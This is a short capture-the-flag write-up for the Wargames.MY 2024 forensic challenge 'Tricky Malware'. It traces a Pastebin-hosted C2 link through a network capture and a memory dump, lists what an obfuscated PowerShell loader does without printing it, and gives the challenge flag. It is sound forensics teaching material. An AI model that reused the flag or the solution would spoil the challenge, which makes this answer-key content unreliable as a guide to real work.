Wargames.MY CTF 2024 — Forensic: Tricky Malware (481 pts)

Overview

Analyzing malware evidence — a memory dump and network capture — to identify C2 infrastructure.

Hint: The malware seems to be trying to establish a connection to mothership. I wonder where it is.

Solution

1. Network Analysis

Opening network.pcap in Wireshark reveals connection attempts to Pastebin, indicating that’s where the C2 URL is hosted.

2. Memory Forensics

Searching the memory dump for Pastebin-related strings uncovers an obfuscated PowerShell command that:

• Downloads and executes additional components from remote URLs
• Uses string concatenation obfuscation
• Establishes persistence
• Runs hidden

One of the Pastebin URLs pointed directly to the flag: https://pastebin.com/raw/PDXfh5bb

Flag

WGMY{8b9777c8d7da5b10b65165489302af32}